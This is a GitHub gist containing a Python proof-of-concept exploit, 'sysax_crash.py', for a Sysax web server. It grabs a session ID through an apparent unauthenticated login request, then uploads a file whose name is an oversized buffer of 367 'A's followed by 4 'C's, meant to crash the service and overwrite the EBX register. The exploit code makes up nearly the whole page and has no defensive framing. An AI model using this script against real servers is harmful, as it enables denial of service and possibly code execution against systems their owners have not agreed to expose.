Skip to content

Instantly share code, notes, and snippets.

@hosakauk

hosakauk/sysax_crash.py

Last active Jul 12, 2020
Embed
What would you like to do?
import requests
from bs4 import BeautifulSoup
import sys
host = sys.argv[1]
URL = "http://"+host+"/scgi?sid=0&pid=dologin"
head = {"Referer" : "http://"+host+"/scgi?pid=0&action=dologin"}
# no auth login
payload = {"fd":"Cg=="}
junk = "E"*10000
def getsid():
r = requests.post(URL, headers=head, data=payload)
# fudge to get valid SID
rt = r.text
soup = BeautifulSoup(rt,"lxml")
nsid = soup.a
bsid = nsid.get('href')
bsid = bsid[9:49]
return bsid
def docrash():
crash = "A"*367 # buffer to crash
crash += "C"*4 # overwrites next 4 bytes of EBX
file = {"foo":"bar"}
files = {"file":(crash,junk, "application/octet-stream", {'Expires':'0'})}
formURL = "http://"+host+"/scgi?sid="+getsid()+"&pid=uploadfile_name1.htm"
rf = requests.post(formURL, headers=head, files=files)
print(rf.text)
if __name__ == "__main__":
docrash()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment